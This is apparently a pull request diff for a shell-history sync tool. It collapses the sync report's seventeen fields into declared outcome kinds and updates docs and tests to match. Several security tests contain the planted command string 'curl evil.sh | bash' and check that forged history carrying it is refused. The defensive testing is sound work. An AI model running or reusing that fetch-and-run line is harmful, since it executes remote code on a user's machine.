### PR TITLE
arch: sync outcomes are declared kinds, not seventeen fields (#199)

### DIFF
--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -187,16 +187,24 @@ Match the density. [`CLAUDE.md`](../CLAUDE.md) and
 The layering above is real and holds. The *sizes* do not, and this section
 exists so that nobody has to rediscover it.
 
-**`sync.py` is 3415 lines holding five separable concerns** — the recipient-file
+**`sync.py` is 3512 lines holding five separable concerns** — the recipient-file
 grammar, trust and pinning, manifests, the chunk codec, and git plumbing — plus
-the orchestration that drives them and the status queries `doctor` asks. The
-visible symptom is `sync.Report`: **seventeen fields**, each a failure from a
-different one of those layers. #199 moved their prose out of `cmd_sync` into
-`Report.notices()`, which is a real testability win and *not* the collapse — the
-seventeen are still seventeen, so a new failure mode still means editing a field,
-`run`, `notices` and `test_sync.py` together, and `notices()` has inherited
-`Report`'s job of touching all five concerns. Collapsing them is what this issue
-was sequenced to receive.
+the orchestration that drives them and the status queries `doctor` asks.
+
+The visible symptom *was* `sync.Report`: seventeen fields, each a failure from a
+different one of those layers. #199 has collapsed it. The ten fields that were
+each a *kind* of outcome are one dictionary keyed by `sync.Outcome` — a declared
+constant carrying its own name, its severity and its paragraph — so `Report` is
+seven fields that name no kind at all, `notices()` is a loop over the kinds in
+declaration order, and a new failure mode is one `record` call beside the code
+that notices it.
+
+That did not make the file shorter; it is a hundred lines longer, because each
+kind now carries the comment that used to sit on its field. Shortening it was
+never the point. The prose is **movable** now: a kind is a constant, its prose
+and one call site, so each slice #201 carves out of this module takes its own
+kinds with it instead of leaving a 143-line method behind that binds all five
+concerns at once.
 
 **`__main__.py` is 1813 lines and inverts pattern 4 in two places.** An installer
 (`installed_shells`, `detect_shells`, `shells_from`, `_hook_bytes`,
@@ -225,9 +233,11 @@ It holds two, and the distinction between them is real rather than a compromise:
   gone.
 - **`Notice`** is an explanation — a paragraph with no label and nothing a marker
   could usefully say, because several of them carry a recovery recipe.
-  `Report.notices()` decides which of eleven apply, and `report.paragraphs`
-  renders them. `cmd_sync`'s eleven `if report.X:` blocks are one loop; the
-  twelfth, `if report.pushed`, is a summary line and stayed.
+  `Report.notices()` decides which apply and `report.paragraphs` renders them.
+  `cmd_sync`'s eleven `if report.X:` blocks became eleven in `notices()` and are
+  now a loop over `sync.OUTCOMES`; the twelfth, `if report.pushed`, is a summary
+  line and stayed. The prose lives on the kind, so neither `Report` nor
+  `notices()` mentions any individual one.
 
 Stretching `Check` to cover both was the other option and it was worse: the label
 column and the marker would have been dead weight on every notice, and `lines()`
@@ -252,6 +262,6 @@ first because they make the expensive one smaller.
 | | issue |
 |---|---|
 | 1 | ~~[#200](https://github.com/martinus/woswoar/issues/200) — split the repo layout out of `store.py`~~ — **done**, as `woswoar/archive.py`. |
-| 2 | [#199](https://github.com/martinus/woswoar/issues/199) — one shape for outcome reporting. `Check` and `Notice` have landed and both `doctor` and `cmd_sync` use them; **`Report`'s seventeen fields are not collapsed**, which was the part #201 was waiting on. |
+| 2 | ~~[#199](https://github.com/martinus/woswoar/issues/199) — one shape for outcome reporting~~ — **done**, in three parts: `report.Check`, `report.Notice`, and `sync.Outcome` collapsing `Report`'s seventeen fields to seven. |
 | 3 | [#202](https://github.com/martinus/woswoar/issues/202) — lift the installer and the setup wizard out of `__main__.py`. |
 | 4 | [#201](https://github.com/martinus/woswoar/issues/201) — split `sync.py`, in slices, after the three above. |

--- a/tests/test_report.py
+++ b/tests/test_report.py
@@ -75,50 +75,67 @@ class TestNotices(unittest.TestCase):
     def test_a_clean_run_says_nothing(self) -> None:
         self.assertEqual(sync.Report().notices(), [])
 
-    #: Every state that produces a notice, and whether it shouts. One list, not
-    #: three: the field names were written out for the count, for the severity,
-    #: and again as the expected sets, so adding a twelfth notice meant editing
-    #: three places and a partial edit left a silently weaker test.
+    #: Every kind that produces a notice, in report order, and whether it
+    #: shouts. Written out by hand on purpose: `sync.OUTCOMES` carries both
+    #: facts now, so reading the severity off the kind and asserting it against
+    #: itself would pass whatever the declaration said. This is the second
+    #: opinion, and the test below ties the two together so a new kind cannot
+    #: arrive without one.
     STATES: ClassVar[dict[str, bool]] = {
         "unreadable": False,
         "stale": False,
         "untrusted": False,
         "unpinned": False,
-        "foreign": False,
         "changed_signer": True,
         "unsignable": True,
         "orphaned": True,
         "manifest_missing": True,
+        "foreign": False,
         "unauthenticated": True,
     }
 
-    def test_each_state_produces_exactly_one_notice_at_the_right_volume(self) -> None:
+    def test_each_kind_produces_exactly_one_notice_at_the_right_volume(self) -> None:
         """Severity is data now, so it can be asserted rather than grepped for.
         The quiet ones are states that are not going wrong -- a machine waiting
         to be accepted -- and the loud ones are the repository disagreeing with
         this machine, or history that could not be published."""
-        for field, shouts in self.STATES.items():
-            with self.subTest(field=field):
+        for kind in sync.OUTCOMES:
+            with self.subTest(kind=kind.name):
                 report_ = sync.Report()
-                setattr(report_, field, {"host/2026-01-01"})
+                report_.record(kind, "host/2026-01-01")
                 notices = report_.notices()
-                self.assertEqual(len(notices), 1, f"{field} produced the wrong count")
-                self.assertIs(notices[0].warning, shouts)
+                self.assertEqual(len(notices), 1, f"{kind.name} produced the wrong count")
+                self.assertIs(notices[0].warning, self.STATES[kind.name])
 
-    def test_every_reportable_field_is_covered(self) -> None:
-        """Without this, deleting a row above would quietly stop testing that
-        state -- the loop would simply have one fewer thing to do."""
+    def test_every_kind_is_covered_by_the_table_above(self) -> None:
+        """Both directions, and both matter. A kind missing from `STATES` is one
+        whose severity nobody stated twice; a row left in `STATES` after its kind
+        went is a `KeyError` waiting in the loop above rather than here, which is
+        a worse place to read it."""
+        self.assertEqual([kind.name for kind in sync.OUTCOMES], list(self.STATES))
+
+    def test_the_notices_come_out_in_the_order_the_kinds_are_declared(self) -> None:
+        """Recorded backwards on purpose. `Report.outcomes` is a dict, and a dict
+        preserves the order things were put into it -- so a `notices` that looped
+        over what this run happened to record, rather than over `OUTCOMES`, would
+        pass any test that recorded them in the right order to begin with. What
+        `cmd_sync` printed was a fixed sequence of `if` blocks, and it should
+        stay one.
+        """
         every = sync.Report()
-        for field in self.STATES:
-            setattr(every, field, {"host/2026-01-01"})
-        self.assertEqual(len(every.notices()), len(self.STATES))
+        for kind in reversed(sync.OUTCOMES):
+            every.record(kind, "host/2026-01-01")
+        self.assertEqual(
+            [notice.body for notice in every.notices()],
+            [kind.body(["host/2026-01-01"]) for kind in sync.OUTCOMES],
+        )
 
     def test_a_revoked_machine_is_told_that_and_nothing_else(self) -> None:
         """Every other line would describe work it did not do: it publishes
         nothing and merges nothing."""
         report_ = sync.Report(revoked=True)
-        report_.unreadable = {"host/2026-01-01"}
-        report_.unauthenticated = {"host/2026-01-02"}
+        report_.record(sync.UNREADABLE, "host/2026-01-01")
+        report_.record(sync.UNAUTHENTICATED, "host/2026-01-02")
         notices = report_.notices()
         self.assertEqual(len(notices), 1)
         self.assertIn("revocation is permanent", notices[0].body)
@@ -135,7 +152,8 @@ class TestNotices(unittest.TestCase):
         """
         days = [f"2026-01-{n:02d}" for n in range(1, 13)]
         report_ = sync.Report()
-        report_.orphaned = set(days)
+        for day in days:
+            report_.record(sync.ORPHANED, day)
         body = report_.notices()[0].body
         listed = body.split("cannot be published: ")[1].split("\n")[0].split(", ")
         self.assertEqual(listed, sorted(days))

--- a/tests/test_sync.py
+++ b/tests/test_sync.py
@@ -366,7 +366,7 @@ class TestTwoMachines(SyncTestCase):
             # alpha's day key and the repo key, so it still cannot read
             # anything, and above all cannot authorise itself to.
             self.assertGreater(report.skipped, 0)
-            self.assertTrue(sync.run().unreadable)
+            self.assertTrue(sync.run().subjects(sync.UNREADABLE))
             self.assertEqual(beta.commands(), set())
 
     def test_a_machine_waiting_for_grant_publishes_at_once_and_only_reads_later(self) -> None:
@@ -387,7 +387,9 @@ class TestTwoMachines(SyncTestCase):
             beta.record("2023-11-15", 1_700_100_000, "beta's own command")
             report = sync.run()
             self.assertEqual(report.lines_exported, 1, "beta should publish without waiting")
-            self.assertTrue(report.unreadable, "but it cannot read alpha's history yet")
+            self.assertTrue(
+                report.subjects(sync.UNREADABLE), "but it cannot read alpha's history yet"
+            )
             self.assertEqual(beta.commands(), {"beta's own command"})
 
         # And alpha, which cloned first, sees it once a human there accepts it.
@@ -1100,7 +1102,9 @@ class TestRevokeSubtraction(SyncTestCase):
         beta = self.machine("beta")
         with beta.active():
             report = sync.run()
-        self.assertTrue(report.unreadable, "beta is waiting for a grant, not revoked")
+        self.assertTrue(
+            report.subjects(sync.UNREADABLE), "beta is waiting for a grant, not revoked"
+        )
         self.assertFalse(report.revoked)
 
     def test_a_key_shaped_like_a_tombstone_is_refused(self) -> None:
@@ -1174,7 +1178,7 @@ class TestARevokedMachineCannotPublish(SyncTestCase):
 
         with gamma.active():
             report = sync.run()
-            self.assertIn(beta.id, report.unpinned)
+            self.assertIn(beta.id, report.subjects(sync.UNPINNED))
             self.assertNotIn("after-the-revocation", gamma.commands())
 
     def test_it_cannot_publish_under_another_machines_id_either(self) -> None:
@@ -1219,7 +1223,7 @@ class TestARevokedMachineCannotPublish(SyncTestCase):
             sync.run()  # sees the tombstone and drops the pin
             report = sync.run()
             self.assertNotIn(beta.id, sync.State.load().signers)
-            self.assertIn(beta.id, report.untrusted)
+            self.assertIn(beta.id, report.subjects(sync.UNTRUSTED))
 
     def test_trust_will_not_re_accept_a_revoked_machine(self) -> None:
         """Otherwise the withdrawal is a suggestion: whoever it was aimed at
@@ -1258,7 +1262,7 @@ class TestExportNeverSignsWhatItDidNotWrite(SyncTestCase):
                 alpha.id, "2023-11-14", crypto.signing_public(store.signing_key_file())
             )
             self.assertNotIn(planted.name, listed, "export signed a chunk it did not write")
-            self.assertIn(f"2023-11-14/{planted.name}", report.foreign)
+            self.assertIn(f"2023-11-14/{planted.name}", report.subjects(sync.FOREIGN))
 
     def test_a_peer_refuses_the_planted_chunk(self) -> None:
         alpha = self.machine("alpha")
@@ -1381,7 +1385,7 @@ class TestCrashDebrisIsNotCalledAnIntruder(SyncTestCase):
         """The claim the message makes, checked rather than asserted in prose."""
         alpha, _stray = self.debris()
         with alpha.active():
-            self.assertTrue(sync.run().foreign)
+            self.assertTrue(sync.run().subjects(sync.FOREIGN))
             self.assertEqual(alpha.commands(), {"one", "two"})
             self.assertEqual(len(alpha.entries()), 2, "a line was published twice")
 
@@ -1428,13 +1432,15 @@ class TestDoctorFindsAChunkNobodySigned(SyncTestCase):
 
         with beta.active():
             # Said once...
-            self.assertIn(f"{alpha.id}/{self.DAY}", sync.run().unauthenticated)
+            self.assertIn(f"{alpha.id}/{self.DAY}", sync.run().subjects(sync.UNAUTHENTICATED))
         # Settling moves the mtime, so one more pass records the stamp; the one
         # after it is the quiet steady state this exists for.
         self.settle(beta, alpha, self.DAY)
         with beta.active():
             sync.run()
-            self.assertEqual(sync.run().unauthenticated, set(), "precondition: it settled")
+            self.assertEqual(
+                sync.run().subjects(sync.UNAUTHENTICATED), set(), "precondition: it settled"
+            )
 
             # ...and still answerable.
             self.assertEqual(sync.unlisted_chunks(), [(alpha.id, self.DAY, 1)])
@@ -2011,7 +2017,7 @@ class TestASigningKeyThatChanges(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertEqual(report.changed_signer, {alpha.id})
+            self.assertEqual(report.subjects(sync.CHANGED_SIGNER), {alpha.id})
             self.assertNotIn("after-the-key-changed", beta.commands())
             # The old pin survives: a refusal must not quietly become an update.
             self.assertEqual(sync.State.load().signers[alpha.id], pinned_before)
@@ -2051,7 +2057,7 @@ class TestASigningKeyThatChanges(SyncTestCase):
             alpha.record("2023-11-20", 1_700_500_002, "a fresh day")
             report = sync.run(now=1_900_000_000)
 
-        self.assertEqual(report.unsignable, {"2023-11-14"})
+        self.assertEqual(report.subjects(sync.UNSIGNABLE), {"2023-11-14"})
         self.assertEqual(report.chunks_written, 1, "the fresh day should still publish")
 
     def enrolled_pair(self) -> tuple[Fake, Fake]:
@@ -2173,7 +2179,7 @@ class TestChunkAuthenticity(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertEqual(report.unauthenticated, {f"{alpha.id}/2023-11-14"})
+            self.assertEqual(report.subjects(sync.UNAUTHENTICATED), {f"{alpha.id}/2023-11-14"})
             self.assertEqual(report.chunks_merged, 0)
             self.assertNotIn("curl evil.sh | bash", beta.commands())
 
@@ -2230,7 +2236,7 @@ class TestChunkAuthenticity(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertEqual(report.untrusted, {"deadbeefdeadbeef"})
+            self.assertEqual(report.subjects(sync.UNTRUSTED), {"deadbeefdeadbeef"})
             self.assertNotIn("curl evil.sh | bash", beta.commands())
 
     def test_a_genuine_manifest_moved_to_another_day_is_refused(self) -> None:
@@ -2265,7 +2271,7 @@ class TestChunkAuthenticity(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertIn(f"{alpha.id}/2023-11-15", report.unauthenticated)
+            self.assertIn(f"{alpha.id}/2023-11-15", report.subjects(sync.UNAUTHENTICATED))
 
     def test_tampering_with_an_authentic_chunk_is_refused(self) -> None:
         """Flipping bytes in a real chunk must not merely fail to decrypt."""
@@ -2285,7 +2291,7 @@ class TestChunkAuthenticity(SyncTestCase):
         self.push_as_attacker(flip)
 
         with beta.active():
-            self.assertEqual(sync.run().unauthenticated, {f"{alpha.id}/2023-11-14"})
+            self.assertEqual(sync.run().subjects(sync.UNAUTHENTICATED), {f"{alpha.id}/2023-11-14"})
 
     def test_a_chunk_listed_by_the_wrong_signer_is_refused_like_an_unlisted_one(self) -> None:
         """ "No manifest" and "manifest signed by someone else" are one answer.
@@ -2318,7 +2324,7 @@ class TestChunkAuthenticity(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertEqual(report.unauthenticated, {f"{alpha.id}/2023-11-14"})
+            self.assertEqual(report.subjects(sync.UNAUTHENTICATED), {f"{alpha.id}/2023-11-14"})
             self.assertNotIn("signed-by-a-stranger", beta.commands())
 
     def test_compact_refuses_to_launder_a_chunk_this_machine_did_not_write(self) -> None:
@@ -2365,7 +2371,7 @@ class TestExportWillNotDisownItsOwnHistory(SyncTestCase):
             alpha.record("2023-11-14", 1_700_000_002, "published later")
             report = sync.run(now=1_900_000_000)
 
-            self.assertIn("2023-11-14", report.unsignable)
+            self.assertIn("2023-11-14", report.subjects(sync.UNSIGNABLE))
             self.assertEqual(
                 report.chunks_written, 0, "a chunk was written with no list to hold it"
             )
@@ -2384,7 +2390,7 @@ class TestExportWillNotDisownItsOwnHistory(SyncTestCase):
             alpha.record("2023-11-15", 1_700_100_001, "day two")
             report = sync.run(now=1_900_000_000)
             self.assertEqual(report.chunks_written, 1)
-            self.assertEqual(report.unsignable, {"2023-11-14"})
+            self.assertEqual(report.subjects(sync.UNSIGNABLE), {"2023-11-14"})
 
 
 class TestTheMergeWatermark(SyncTestCase):
@@ -2439,7 +2445,7 @@ class TestTheMergeWatermark(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertTrue(report.unauthenticated)
+            self.assertTrue(report.subjects(sync.UNAUTHENTICATED))
             self.assertIn("second command", beta.commands())
             self.assertNotIn("first command", beta.commands())
 
@@ -2704,7 +2710,7 @@ class TestADecompressionBomb(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertIn(f"{alpha.id}/{day}", report.unreadable)
+            self.assertIn(f"{alpha.id}/{day}", report.subjects(sync.UNREADABLE))
             self.assertEqual(beta.commands(), {"an ordinary command"})
             log = store.log_file(alpha.id, day)
             self.assertLess(log.stat().st_size, 1024, "the bomb reached the log file")
@@ -3127,7 +3133,7 @@ class TestAnOrphanedDayKey(SyncTestCase):
             report = sync.run()
 
             self.assertEqual(report.chunks_written, 0)
-            self.assertEqual(report.orphaned, {"2023-11-14"})
+            self.assertEqual(report.subjects(sync.ORPHANED), {"2023-11-14"})
             self.assertEqual({c.name for c in archive.iter_chunks(alpha.id)}, before)
 
     def test_the_lines_stay_pending_rather_than_being_lost(self) -> None:
@@ -3146,7 +3152,7 @@ class TestAnOrphanedDayKey(SyncTestCase):
             # ordinary sync.
             store.write_atomic(archive.day_key(alpha.id, "2023-11-14"), sealed)
             report = sync.run()
-            self.assertEqual(report.orphaned, set())
+            self.assertEqual(report.subjects(sync.ORPHANED), set())
             self.assertGreater(report.chunks_written, 0)
 
     def test_a_day_with_no_chunks_yet_simply_mints_a_new_key(self) -> None:
@@ -3164,7 +3170,7 @@ class TestAnOrphanedDayKey(SyncTestCase):
             alpha.record("2023-11-14", 1_700_000_001, "first")
             report = sync.run()
 
-            self.assertEqual(report.orphaned, set())
+            self.assertEqual(report.subjects(sync.ORPHANED), set())
             self.assertEqual(report.chunks_written, 1)
             self.assertTrue(archive.day_key(alpha.id, "2023-11-14").is_file())
             self.assertNotEqual(
@@ -3322,7 +3328,7 @@ class TestADeletedManifest(SyncTestCase):
             report = sync.run()
 
             self.assertEqual(report.chunks_written, 0)
-            self.assertEqual(report.manifest_missing, {"2023-11-14"})
+            self.assertEqual(report.subjects(sync.MANIFEST_MISSING), {"2023-11-14"})
             self.assertEqual({c.name for c in archive.iter_chunks(alpha.id)}, before)
             # The disowning itself: a replacement would name only this run.
             self.assertFalse(path.exists(), "a replacement manifest was signed")
@@ -3343,7 +3349,7 @@ class TestADeletedManifest(SyncTestCase):
 
             store.write_atomic(path, original)
             report = sync.run()
-            self.assertEqual(report.manifest_missing, set())
+            self.assertEqual(report.subjects(sync.MANIFEST_MISSING), set())
             self.assertEqual(report.chunks_written, 1)
 
         with beta.active():
@@ -3372,7 +3378,7 @@ class TestADeletedManifest(SyncTestCase):
             alpha.record("2023-11-20", 1_700_500_000, "mine")
             report = sync.run()
 
-            self.assertEqual(report.manifest_missing, set())
+            self.assertEqual(report.subjects(sync.MANIFEST_MISSING), set())
             self.assertEqual(report.chunks_written, 1)
             self.assertTrue(archive.day_manifest(alpha.id, "2023-11-20").exists())
 
@@ -3727,7 +3733,7 @@ class TestADayThatGainsAChunkAfterCompaction(SyncTestCase):
 
         with beta.active(), mock.patch.object(sync, "open_chunk", refuse):
             report = sync.run()
-        self.assertIn(f"{alpha.id}/2023-11-14", report.unauthenticated)
+        self.assertIn(f"{alpha.id}/2023-11-14", report.subjects(sync.UNAUTHENTICATED))
 
         # The next pass must still owe a rewrite. If the failed one was recorded
         # as done, this appends the compacted chunk to a day that still holds
@@ -3823,7 +3829,7 @@ class TestARewriteIsAllOrNothing(SyncTestCase):
 
         with beta.active(), mock.patch.object(sync, "open_chunk", self.damaged(compacted)):
             report = sync.run()
-            self.assertIn(f"{alpha.id}/{self.DAY}", report.stale)
+            self.assertIn(f"{alpha.id}/{self.DAY}", report.subjects(sync.STALE))
             self.assertEqual(len(beta.entries()), 5, "the day was rewritten from a partial read")
 
             # And it stays whole for as long as the chunk stays damaged.
@@ -3871,8 +3877,8 @@ class TestARewriteIsAllOrNothing(SyncTestCase):
             (archive.chunk_dir(alpha.id, self.DAY) / "1700000000-dead.age").write_bytes(b"x")
 
             report = sync.run()
-            self.assertIn(f"{alpha.id}/{self.DAY}", report.unauthenticated)
-            self.assertNotIn(f"{alpha.id}/{self.DAY}", report.stale)
+            self.assertIn(f"{alpha.id}/{self.DAY}", report.subjects(sync.UNAUTHENTICATED))
+            self.assertNotIn(f"{alpha.id}/{self.DAY}", report.subjects(sync.STALE))
             self.assertEqual(len(beta.entries()), 6, "the stray blocked the rebuild")
 
     def test_a_refused_rewrite_is_never_treated_as_finished(self) -> None:
@@ -3931,7 +3937,7 @@ class TestARewriteIsAllOrNothing(SyncTestCase):
 
         self.settle(beta, alpha, self.DAY)
         with beta.active(), mock.patch.object(sync, "open_chunk", self.damaged(first)):
-            self.assertIn(key, sync.run().stale)
+            self.assertIn(key, sync.run().subjects(sync.STALE))
             self.assertNotIn(key, sync.State.load().merged_at, "a refused rewrite was stamped")
             self.assertEqual(len(beta.entries()), 5, "the day was rebuilt from a partial read")
 
@@ -3962,7 +3968,7 @@ class TestARewriteIsAllOrNothing(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-            self.assertIn(f"{alpha.id}/{self.DAY}", report.stale)
+            self.assertIn(f"{alpha.id}/{self.DAY}", report.subjects(sync.STALE))
             self.assertEqual(len(beta.entries()), 5, "the day was rewritten without it")
             for _ in range(3):
                 sync.run()
@@ -4006,7 +4012,7 @@ class TestARewriteIsAllOrNothing(SyncTestCase):
 
         with beta.active(), mock.patch.object(sync, "open_chunk", self.damaged(names[-1])):
             report = sync.run()
-            self.assertNotIn(f"{alpha.id}/{self.DAY}", report.stale)
+            self.assertNotIn(f"{alpha.id}/{self.DAY}", report.subjects(sync.STALE))
             # The one that read was kept, rather than held back with the other.
             self.assertEqual(len(beta.entries()), 3)
         with beta.active():
@@ -4060,7 +4066,7 @@ class TestADayIsWhatItsManifestSays(SyncTestCase):
         # Said once, because the day did change -- and that pass is the one
         # that pays for the manifest.
         with beta.active():
-            self.assertIn(f"{alpha.id}/{self.DAY}", sync.run().unauthenticated)
+            self.assertIn(f"{alpha.id}/{self.DAY}", sync.run().subjects(sync.UNAUTHENTICATED))
         # Then never again while the directory is untouched. Settling here would
         # move the mtime and legitimately earn another look.
         self.assertEqual([self.verifications(beta) for _ in range(3)], [0, 0, 0])
@@ -4269,7 +4275,7 @@ class TestSkippingAnUnchangedDay(SyncTestCase):
         self.settle(beta, alpha, "2023-11-15")
         with beta.active(), mock.patch.object(sync, "open_chunk", refuse):
             report = sync.run()
-        self.assertIn(f"{alpha.id}/2023-11-15", report.unauthenticated)
+        self.assertIn(f"{alpha.id}/2023-11-15", report.subjects(sync.UNAUTHENTICATED))
 
         # Nothing changed on disk, so only an unstamped day gets a second look.
         self.assertEqual(self.listed(beta), ["2023-11-15"])
@@ -4716,7 +4722,7 @@ class TestSyncDoesNotForkGitMoreThanItNeedsTo(SyncTestCase):
             alpha.record("2023-11-14", 1_700_000_002, "make -j8")
 
             first = self.git_calls()
-            self.assertIn("2023-11-14", sync.run().orphaned)
+            self.assertIn("2023-11-14", sync.run().subjects(sync.ORPHANED))
             for _ in range(3):
                 calls = self.git_calls()
                 self.assertEqual(

--- a/woswoar/sync.py
+++ b/woswoar/sync.py
@@ -30,7 +30,7 @@ import subprocess
 import time
 import zlib
 from collections import Counter
-from collections.abc import Iterable, Iterator
+from collections.abc import Callable, Iterable, Iterator
 from contextlib import contextmanager
 from dataclasses import dataclass, field
 from pathlib import Path
@@ -83,8 +83,225 @@ class SyncError(WoswoarError):
     pass
 
 
+class Outcome:
+    """One way a sync run goes other than plainly working.
+
+    Everything about a kind in one literal: what it is called, how loudly to say
+    it, and the paragraph that explains it. Those three used to live apart -- a
+    field on `Report`, a `warning=True` argument, and one branch of a 143-line
+    `notices` -- and the drift that costs was already visible before this: a
+    field comment here named `trust` where the message on screen names `accept`.
+
+    Declaring them together is also what makes them movable, which is the reason
+    this landed before #201 rather than after. A kind now travels with the code
+    that detects it: the constant, its prose and the `record` call are the whole
+    of it, and neither `Report` nor `notices` names a single one of them.
+
+    ``body`` is handed the subjects already sorted. Every message that lists them
+    listed them sorted, and the ones that only count them do not care -- so the
+    sort belongs here rather than being repeated, or forgotten, in each.
+
+    A plain class rather than the `NamedTuple` this file uses elsewhere, because
+    these are singletons used as dictionary keys and identity is the equality
+    wanted. A tuple compares by value, so two kinds that happened to be worded
+    alike would silently be one key.
+    """
+
+    def __init__(
+        self, name: str, body: Callable[[list[str]], str], *, warning: bool = False
+    ) -> None:
+        #: For `repr` alone: a failing test prints the whole `Report`, and
+        #: `<Outcome unreadable>` is the difference between reading that and not.
+        self.name = name
+        self.body = body
+        #: Worth shouting about: the repository disagrees with what this machine
+        #: expects, or history could not be published. The quieter ones are
+        #: ordinary states -- a machine not granted access yet, a peer nobody has
+        #: accepted -- which are not going wrong so much as not finished.
+        self.warning = warning
+        OUTCOMES.append(self)
+
+    def __repr__(self) -> str:
+        return f"<Outcome {self.name}>"
+
+
+#: Every kind of outcome, in the order a run reports them. Appended to by
+#: `Outcome` itself as each is declared, rather than written out a second time
+#: underneath them: a hand-kept list is a second thing to keep in step, and a
+#: kind missing from it would never be reported at all -- silently, because
+#: nothing else reads this.
+OUTCOMES: list[Outcome] = []
+
+
+#: "<host>/<day>" entries sealed before this machine was enrolled. Not an error:
+#: it is what a freshly joined machine sees until someone runs `grant` on a
+#: machine that was already a recipient.
+UNREADABLE = Outcome(
+    "unreadable",
+    lambda days: (
+        f"{len(days)} day(s) of history are sealed to recipients that do not include\n"
+        "this machine - it joined after they were written.\n"
+        f"{_GRANT_REMEDY}"
+    ),
+)
+
+#: "<host>/<day>" left exactly as it was, because rebuilding it would have needed
+#: a chunk this machine could not read. Stale rather than short: the day keeps
+#: every line it already had, and the next sync tries again.
+STALE = Outcome(
+    "stale",
+    lambda days: (
+        f"{len(days)} day(s) could not be rebuilt, and were left exactly as\n"
+        "they were rather than rewritten from the part that could be read:\n"
+        f"{', '.join(days)}\n"
+        "Nothing was lost. If it persists, a chunk of that day is damaged in this\n"
+        "checkout, or missing from it; woswoar never rewrites or deletes a chunk,\n"
+        "so 'git -C ~/.local/share/woswoar/history log --diff-filter=MD' finds who\n"
+        "did."
+    ),
+)
+
+#: Hosts publishing history under a signing key nobody here has accepted. Not an
+#: error and usually not an attack.
+UNTRUSTED = Outcome(
+    "untrusted",
+    lambda hosts: (
+        f"{len(hosts)} machine(s) publish history this one has not been\n"
+        "told to accept, so none of it was merged. That is what a machine enrolled\n"
+        "since this one last looked is supposed to look like.\n"
+        "    woswoar accept"
+    ),
+)
+
+#: Hosts whose pin was dropped because a tombstone withdrew them.
+UNPINNED = Outcome(
+    "unpinned",
+    lambda hosts: (
+        f"{len(hosts)} machine(s) were withdrawn by a revocation. Nothing\n"
+        "they publish is accepted here any more, including history they published\n"
+        "before it that this machine had not yet merged."
+    ),
+)
+
+#: Hosts now publishing under a different key than the one pinned here. Never
+#: resolved silently.
+CHANGED_SIGNER = Outcome(
+    "changed_signer",
+    lambda hosts: (
+        f"{len(hosts)} machine(s) now sign with a different\n"
+        "key than the one accepted here, and nothing from them was merged. That is\n"
+        "either a machine that was re-enrolled or someone rewriting the repository,\n"
+        "and woswoar cannot tell which. If you re-enrolled it, accept the new key:\n"
+        "    woswoar trust --replace"
+    ),
+    warning=True,
+)
+
+#: Days of this machine's own history it could not extend, because the manifest
+#: already there is one it cannot verify.
+UNSIGNABLE = Outcome(
+    "unsignable",
+    lambda days: (
+        f"{len(days)} day(s) of this machine's own history\n"
+        "could not be published, because the signed list already in the repository\n"
+        "for them is not one this machine can verify. Publishing a replacement\n"
+        "would disown everything it published earlier on those days.\n"
+        "If this machine's signing key was replaced, that is why: days it signed\n"
+        "with the old one stay as they are, and new days publish normally."
+    ),
+    warning=True,
+)
+
+#: Days of this machine's own history whose sealed day key has gone while chunks
+#: sealed to its public half remain. Nothing further is written for them, because
+#: a new key cannot rescue what the old one sealed.
+ORPHANED = Outcome(
+    "orphaned",
+    lambda days: (
+        f"{len(days)} day(s) of this machine's own history\n"
+        f"cannot be published: {', '.join(days)}\n"
+        "Their sealed key is missing from the repository while chunks encrypted to\n"
+        "it are still there. Those chunks are unreadable by every machine, and a\n"
+        "new key would not change that -- so nothing more is written for those\n"
+        "days rather than adding chunks nobody will ever read.\n"
+        "The commands themselves are still in this machine's own logs.\n"
+        f"{_restore_remedy('hosts/<id>/keys/<day>.age')}"
+        "'woswoar doctor' prints the host id and day. If it really is gone, delete\n"
+        "keys/<day>.pub to write the day off: the old chunks stay unreadable, but\n"
+        "this machine starts a new key and publishes again."
+    ),
+    warning=True,
+)
+
+#: Days this machine has published before whose signed manifest has gone. Nothing
+#: is written for them.
+MANIFEST_MISSING = Outcome(
+    "manifest_missing",
+    lambda days: (
+        f"{len(days)} day(s) of this machine's own\n"
+        f"history cannot be published: {', '.join(days)}\n"
+        "The signed list this machine published for them is gone from the\n"
+        "repository. Signing a replacement would name only what is written now,\n"
+        "so every chunk published earlier that day would stop being one any peer\n"
+        "accepts. Nothing is written for those days instead.\n"
+        f"{_restore_remedy('hosts/<id>/manifests/<day>')}"
+        "'woswoar doctor' prints the days."
+    ),
+    warning=True,
+)
+
+#: "<day>/<name>" chunks sitting under *this* machine's own id that it never
+#: published. Nothing else would ever look at them -- `merge` skips our own id --
+#: and they are deliberately not swept into a manifest we sign.
+FOREIGN = Outcome(
+    "foreign",
+    lambda chunks: (
+        f"{len(chunks)} chunk(s) sit under this machine's own id that it\n"
+        "never signed. They are inert: no machine will read them, including this\n"
+        "one, and nothing was lost -- whatever was in them has been published again\n"
+        "under a chunk that is signed.\n"
+        "Two things look like this and cannot be told apart from here: a run of\n"
+        "this machine that was killed between writing a chunk and signing for it,\n"
+        "and someone else writing into the repository. A power cut is the ordinary\n"
+        "explanation. 'woswoar doctor' lists them under 'chunks'."
+    ),
+)
+
+#: "<host>/<day>" entries that could not be authenticated, and so were refused
+#: rather than merged.
+#:
+#: One category on purpose: a manifest that is missing, malformed, signed by the
+#: wrong key, or signed for another day are the same answer, as is a chunk whose
+#: digest it does not list. Splitting them on the shape of the bytes was tried
+#: and reverted, because an attacker can produce any of those shapes at will --
+#: so the split told the reassuring story for exactly the case that most needed
+#: reporting.
+UNAUTHENTICATED = Outcome(
+    "unauthenticated",
+    lambda days: (
+        f"{len(days)} day(s) of history could not be\n"
+        "authenticated and were refused. Every machine signs a list of the chunks\n"
+        "it published, so this means the repo contains history none of your\n"
+        "machines put its name to - someone else can write to it."
+    ),
+    warning=True,
+)
+
+
 @dataclass
 class Report:
+    """What one sync run did.
+
+    Seventeen fields once: four counters, two flags, a set of hosts, and ten
+    more sets that were each a *kind* of outcome. Those ten are now one
+    dictionary keyed by `Outcome`, which is what makes adding a failure mode a
